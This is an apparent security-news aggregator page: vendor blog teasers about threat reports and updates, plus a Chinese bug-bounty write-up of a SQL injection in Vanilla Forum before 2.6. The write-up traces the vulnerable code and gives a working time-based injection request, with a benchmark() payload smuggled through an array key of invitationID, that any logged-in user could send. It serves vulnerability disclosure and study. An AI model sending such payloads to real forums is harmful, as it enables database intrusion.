Aggregator

Today, we released security updates to provide additional protections against malicious attackers. As a best practice, we encourage customers to turn on automatic updates. More information about this month’s security updates can be found in the Security Update Guide. MSRC team

Today, we released security updates to provide additional protections against malicious attackers. As a best practice, we encourage customers to turn on automatic updates. More information about this month’s security updates can be found in the Security Update Guide. MSRC team

Time for a Cyber Safety Check-Up? Aussies love the internet. And the statistics just confirm it. In 2018, 88% of...

The post Stay Smart Online Week 2018 appeared first on McAfee Blog.

0x00 前言 Java反序列化的漏洞爆发很久了，此前一直想学习一下。无奈Java体系太过于复杂，单是了解就花了我很久的时间，再加上懒，就一直拖着，今天恰好有空，参考@iswin大佬两年前的分析，我自己跟踪了一下流程，并按自己的想法重写了一下POC，在此做个记录。 0x01 漏洞环境搭建 首先我们需

Termux是一个 Android 终端模拟器以及提供 Linux 环境的应用程序。跟许多其他应用程序不同，无需 root 设备也无需进行设置。它是开箱即用的！它会自动安装好一个最基本的 Linux 系统，当然也可以使用 APT 软件包管理器来安装其他软件包。总之，你可以让你的 Android 设备

该文被密码保护。

1.pip pip升级10.0.1之后执行 sudo pip install 会报错 ImportError: cannot import name 'Process' 查阅百度，基本都是sys.exit(main())改为sys.exit(__main__.main())，办法估计全是复制粘贴，根

中国人民公安大学 Chinese people’ public security university 网络对抗技术 实验报告 实验二 网络嗅探与欺骗 学生姓名 年级 2015 区队 四 指导教师 高建 信息技术与网络安全学院 2018年11月7日 实验任务总纲 2018—2019 学年 第 一 学

Every three months, our team crafts the McAfee Labs Threats Report. The quarterly report ranges in topic and severity but always...

The post Digital Assistants, Cryptocurrency, Mobile Malware: ‘McAfee Labs Threats Report’ Trends appeared first on McAfee Blog.

F5 Labs' David Warburton writes for Global Banking & Finance Review, discussing the feasibility of attacks against blockchains.

F5 Labs' Ray Pompon writes for Help Net Security, describing the multifaceted dangers of false positives.

简介

该漏洞是四月份我在h1上挖到的，原文是英文，为了方便分享，我重新写成中文并发表在博客上。

Vanilla是国外的一个论坛程序，是一款开源的PHP程序。github地址为:https://github.com/vanilla/vanilla

在Vanilla Forum 2.6之前，存在一个SQL注入漏洞，攻击者只需要注册登录一个会员即可利用该漏洞。

漏洞分析

首先在applications/dashboard/controllers/class.profilecontroller.php:274

public function deleteInvitation($invitationID) { $this->permission('Garden.SignIn.Allow'); if (!$this->Form->authenticatedPostBack()) { throw forbiddenException('GET'); } $invitationModel = new InvitationModel(); $invitationModel->delete($invitationID); $this->informMessage(t('The invitation was removed successfully.')); $this->jsonTarget(".js-invitation[data-id=\"{$invitationID}\"]", '', 'SlideUp'); $this->render('Blank', 'Utility'); }

这个函数有个形参$invitationID，这个值其实是我们通过URL传递进来的，是我们可控的，并且这里需要注意的是，该值是可以为一个数组。

首先该函数第一行判断了权限，需要登录。

第二行是一个csrf token的判断，利用这个漏洞不能直接发POST包。

然后下面就到了关键的地方，可以看到这里将$invitationID带入到了delete函数中，我们跟踪一下该函数。

applications/dashboard/models/class.invitationmodel.php:225

public function delete($where = [], $options = []) { if (is_numeric($where)) { deprecated('InvitationModel->delete(int)', 'InvitationModel->deleteID(int)'); $result = $this->deleteID($where, $options); return $result; } parent::delete($where, $options); }

这里的参数$where就是我们上文的$invitationID，是可控的，然后这里又将$where带入到了另外一个delete函数中，继续追踪。

public function delete($where = [], $options = []) { if (is_numeric($where)) { deprecated('Gdn_Model->delete(int)', 'Gdn_Model->deleteID()'); $where = [$this->PrimaryKey => $where]; } $resetData = false; if ($options === true || val('reset', $options)) { deprecated('Gdn_Model->delete() with reset true'); $resetData = true; } elseif (is_numeric($options)) { deprecated('The $limit parameter is deprecated in Gdn_Model->delete(). Use the limit option.'); $limit = $options; } else { $options += ['rest' => true, 'limit' => null]; $limit = $options['limit']; } if ($resetData) { $result = $this->SQL->delete($this->Name, $where, $limit); } else { $result = $this->SQL->noReset()->delete($this->Name, $where, $limit); } return $result; }

然后该函数中又将$where带入到了$this->SQL->noReset()->delete函数中，继续追踪。

library/database/class.sqldriver.php:333

public function delete($table = '', $where = '', $limit = false) { if ($table == '') { if (!isset($this->_Froms[0])) { return false; } $table = $this->_Froms[0]; } elseif (is_array($table)) { foreach ($table as $t) { $this->delete($t, $where, $limit, false); } return; } else { $table = $this->escapeIdentifier($this->Database->DatabasePrefix.$table); } if ($where != '') { $this->where($where); } if ($limit !== false) { $this->limit($limit); } if (count($this->_Wheres) == 0) { return false; } $sql = $this->getDelete($table, $this->_Wheres, $this->_Limit); return $this->query($sql, 'delete'); }

该函数中对我们传递进来的$where有个判断和操作，如果不为空，就带入到where函数中去，跟踪一下该函数。

public function where($field, $value = null, $escapeFieldSql = true, $escapeValueSql = true) { if (!is_array($field)) { $field = [$field => $value]; } foreach ($field as $subField => $subValue) { if (is_array($subValue)) { if (count($subValue) == 1) { $firstVal = reset($subValue); $this->where($subField, $firstVal); } else { $this->whereIn($subField, $subValue); } } else { $whereExpr = $this->conditionExpr($subField, $subValue, $escapeFieldSql, $escapeValueSql); if (strlen($whereExpr) > 0) { $this->_where($whereExpr); } } } return $this; }

这里其实就是一个组装where语句的函数，由于$where我们可控制，导致这里组装后的where语句的字段处也可以控制，所以就产生了一个SQL注入漏洞。

漏洞证明

1. 该漏洞利用需要用户登陆，因为是论坛，所以注册登录不是什么难事。
2. 开头提了一下，由于有CSRF TOKEN的校验，所以不能直接发POST包，但是我们可以随便点击论坛一个正常的POST请求，然后用Burpsuite来改即可。
3. 这里我使用的是延时注入，用的是benchmark函数。不同环境的延时时间也不一样的。

附上POC:

POST /profile/deleteInvitation?invitationID[1%3dbenchmark(40000000,sha(1))+and+1]=balisong HTTP/1.1 Host: localhost Content-Length: 29 Pragma: no-cache Cache-Control: no-cache Accept: application/json, text/javascript, */*; q=0.01 Origin: http://localhost X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://localhost/profile/ Accept-Language: zh-CN,zh;q=0.9 Cookie: Drupal.toolbar.collapsed=0; hd_sid=udVsUw; XDEBUG_SESSION=PHPSTORM; Vanilla=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE1MjkyMDE2NTAsImlhdCI6MTUyNjYwOTY1MCwic3ViIjo3fQ.of1gk2CHyzeomQNSMWz_8WXXi_FfCwKxyctVWZlemKI; Vanilla-Vv=1526609650; Vanilla-tk=caEyM0dSVZC0xDhU%3A7%3A1526609650%3Ab23a6efff2dd9f026ffa87db10ba4119 Connection: close TransientKey=caEyM0dSVZC0xDhU

然后这里延时了9秒。如图所示:

结语

其实这种漏洞很常见，很多程序在处理SQL语句的时候，都采用的这种写法，当然这种写法是没错的。主要还是因为开发人员太信任外部的输入了。

该程序在该版本相同类型的漏洞还有一个，大家有兴趣的话可以自己找一找。(当然我已经提交给厂商啦。)

Don’t we all kinda secretly hope, even pretend, that our biggest fears are in the process of remedying themselves? Like...

The post #CyberAware: Will You Help Make the Internet a Safe Place for Families? appeared first on McAfee Blog.

Another day, another Facebook story. In May, a Facebook Messenger malware named FacexWorm was utilized by cybercriminals to steal user...

The post Facebook Announces Security Flaw Found in “View As” Feature appeared first on McAfee Blog.

归因溯源技术有没有成为杀手锏的潜质？

Verisign just released its Q2 2018 DDoS Trends Report, which represents a unique view into the attack trends unfolding online, through observations and insights derived from distributed denial of service (DDoS) attack mitigations enacted on behalf of customers of Verisign DDoS Protection Services. Verisign observed that 52 percent of DDoS attacks that were mitigated in Q2 2018 […]

The post Q2 2018 DDOS TRENDS REPORT: 52 PERCENT OF ATTACKS EMPLOYED MULTIPLE ATTACK TYPES appeared first on Verisign Blog.

There are many good reasons for having a national ID system, but proper implementation is crucial to mitigate threats and maintain the balance of data privacy.

互联网的开放互联特性真的会让归因溯源成为不可能的任务么？